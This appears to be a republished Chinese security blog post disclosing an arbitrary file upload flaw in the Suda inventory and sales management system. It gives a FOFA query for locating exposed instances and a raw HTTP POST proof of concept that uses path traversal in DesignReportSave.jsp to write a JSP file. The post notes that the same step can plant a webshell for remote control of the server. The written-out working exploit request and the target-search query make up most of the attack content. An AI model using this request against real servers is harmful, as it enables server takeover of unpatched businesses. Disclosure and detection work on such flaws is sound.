速达进存销管理系统任意文件上传漏洞
2023-12-11 21:51:30 Author: 网络安全透视镜(查看原文) 阅读量:20 收藏

速达进存销管理系统是一套完整的企业业务管理系统,统有机的将企业进货管理、销售管理、仓储管理、财务管理融为一体,有着极好易用性和实用性,全面提升了企业的管理能力和工作效率。由于速达软件技术(广州)有限公司开发。

该系统存在任意文件上传漏洞,通过此漏洞攻击者可上传webshell木马,远程控制服务器。

fofa查询

app="速达软件-公司产品"

POC

POST /report/DesignReportSave.jsp?report=../check.jsp HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Connection: close Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Upgrade-Insecure-Requests: 1Content-Type: application/octet-streamContent-Length: 54
<% out.print("This website has a vulnerability!!!");%>

上传成功后,访问路径 :/check.jsp 返回如下,则漏洞存在

nuclei检测

pocsuite3检测

漏洞检测脚本已上传免费漏洞库

地址:

https://github.com/Vme18000yuan/FreePOC


文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498691&idx=1&sn=7e21bba222ad00d48a6591b8acc27905&chksm=974c5cfba03bd5ed3c2ee00e7c13316f9ea3c545b1d8e4e435197287c776d45b0c52ca6de17b&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh